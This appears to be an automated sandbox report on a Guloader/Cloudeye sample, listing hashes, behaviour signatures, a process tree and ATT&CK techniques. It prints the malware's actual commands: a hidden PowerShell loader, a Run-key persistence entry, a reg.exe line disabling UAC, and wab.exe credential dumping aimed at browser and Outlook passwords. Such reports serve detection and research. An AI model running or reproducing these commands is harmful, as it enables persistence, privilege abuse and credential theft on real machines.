Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted
09-07-2024 11:16
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240704-en
General
-
Target
MalwareBazaar.exe
-
Size
401KB
-
MD5
f1043033237fa935ef9af72415e657a1
-
SHA1
b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
-
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
-
SHA512
1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
-
SSDEEP
6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes: reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource | yara_rule
behavioral2/memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp | MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral2/memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
Nirsoft 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2844-73-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
behavioral2/memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp | Nirsoft
behavioral2/memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes: wab.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | wab.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes: reg.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" | reg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes: wab.exe
pid | process
3188 | wab.exe
3188 | wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, wab.exe
pid | process
2952 | powershell.exe
3188 | wab.exe
Suspicious use of SetThreadContext 4 IoCs
Processes: powershell.exe, wab.exe
description | pid | process | target process
PID 2952 set thread context of 3188 | 2952 | powershell.exe | wab.exe
PID 3188 set thread context of 4948 | 3188 | wab.exe | wab.exe
PID 3188 set thread context of 208 | 3188 | wab.exe | wab.exe
PID 3188 set thread context of 2844 | 3188 | wab.exe | wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes: powershell.exe, wab.exe, wab.exe
pid | process
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
2952 | powershell.exe
4948 | wab.exe
4948 | wab.exe
2844 | wab.exe
2844 | wab.exe
4948 | wab.exe
4948 | wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs
Processes: powershell.exe, wab.exe
pid | process
2952 | powershell.exe
3188 | wab.exe
3188 | wab.exe
3188 | wab.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, wab.exe
description | pid | process
Token: SeDebugPrivilege | 2952 | powershell.exe
Token: SeDebugPrivilege | 2844 | wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: wab.exe
pid | process
3188 | wab.exe
Suspicious use of WriteProcessMemory 32 IoCs
Processes: MalwareBazaar.exe, powershell.exe, wab.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 2456 wrote to memory of 2952 | 2456 | MalwareBazaar.exe | powershell.exe
PID 2456 wrote to memory of 2952 | 2456 | MalwareBazaar.exe | powershell.exe
PID 2456 wrote to memory of 2952 | 2456 | MalwareBazaar.exe | powershell.exe
PID 2952 wrote to memory of 3188 | 2952 | powershell.exe | wab.exe
PID 2952 wrote to memory of 3188 | 2952 | powershell.exe | wab.exe
PID 2952 wrote to memory of 3188 | 2952 | powershell.exe | wab.exe
PID 2952 wrote to memory of 3188 | 2952 | powershell.exe | wab.exe
PID 2952 wrote to memory of 3188 | 2952 | powershell.exe | wab.exe
PID 3188 wrote to memory of 1692 | 3188 | wab.exe | cmd.exe
PID 3188 wrote to memory of 1692 | 3188 | wab.exe | cmd.exe
PID 3188 wrote to memory of 1692 | 3188 | wab.exe | cmd.exe
PID 1692 wrote to memory of 1776 | 1692 | cmd.exe | reg.exe
PID 1692 wrote to memory of 1776 | 1692 | cmd.exe | reg.exe
PID 1692 wrote to memory of 1776 | 1692 | cmd.exe | reg.exe
PID 3188 wrote to memory of 2912 | 3188 | wab.exe | cmd.exe
PID 3188 wrote to memory of 2912 | 3188 | wab.exe | cmd.exe
PID 3188 wrote to memory of 2912 | 3188 | wab.exe | cmd.exe
PID 2912 wrote to memory of 5068 | 2912 | cmd.exe | reg.exe
PID 2912 wrote to memory of 5068 | 2912 | cmd.exe | reg.exe
PID 2912 wrote to memory of 5068 | 2912 | cmd.exe | reg.exe
PID 3188 wrote to memory of 4948 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 4948 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 4948 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 4948 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 208 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 208 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 208 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 208 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 2844 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 2844 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 2844 | 3188 | wab.exe | wab.exe
PID 3188 wrote to memory of 2844 | 3188 | wab.exe | wab.exe
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
- Suspicious use of WriteProcessMemory
PID: 2456
Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2952
Level 3: C:\Program Files (x86)\windows mail\wab.exe
Command line: "C:\Program Files (x86)\windows mail\wab.exe"
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 3188
Level 4: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
- Suspicious use of WriteProcessMemory
PID: 1692
Level 5: C:\Windows\SysWOW64\reg.exe
Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
- Adds Run key to start application
- Modifies registry key
PID: 1776
Level 4: C:\Windows\SysWOW64\cmd.exe
Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- Suspicious use of WriteProcessMemory
PID: 2912
Level 5: C:\Windows\SysWOW64\reg.exe
Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- UAC bypass
- Modifies registry key
PID: 5068
Level 4: C:\Program Files (x86)\windows mail\wab.exe
Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf"
- Suspicious behavior: EnumeratesProcesses
PID: 4948
Level 4: C:\Program Files (x86)\windows mail\wab.exe
Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pkakggdouvojafgguiiozutvhmvho"
- Accesses Microsoft Outlook accounts
PID: 208
Level 4: C:\Program Files (x86)\windows mail\wab.exe
Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rmochzopidgodtcsdsvikznepafihxzbm"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2844
Level 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4112,i,3409420486566309625,12100452682816721435,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
PID: 1456
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Boot or Logon Autostart Execution (1)
Registry Run Keys / Startup Folder (1)
Downloads
-
Filesize
144B
MD5 4496987350b4a169bec8278ece79cb10
SHA1 8ff5a04d767b629fd84994aea45f1220ff917e74
SHA256 945ba0e98daefbf99b29b2c5f06e616bb3cc42d4b802e3111a7581a6acf5e821
SHA512 61ee8b463e918b47fb1c4496cab11adecd72eeb49dfbd33a676ac694958a20edacf40d0846a575f223032ca1310c8cd8f2142a5dec17ecd5ff74c30a3a719ba4
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5 be3be306ce816aa6030d9bfec1df34b0
SHA1 66b10c4578245de0f78c445119e67f0bfb84bbf3
SHA256 0c38ee44dc9eb4f240b667240c115fed88091bc04001d909b841ad8570738467
SHA512 b9aee88755e6e239c7aa1d3c39488722786c1faa01de3c70cf822059f461ca277965b8dd50773e015444a83cc69b5f31c6379957de54a5073ef8799b26a12bcc
-
Filesize
350KB
MD5 be381f7baf52513e52dfed9361a6dc69
SHA1 a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256 caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512 c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a
-
Filesize
69KB
MD5 8172795f7c8cfb7cc597e879d2b0b468
SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322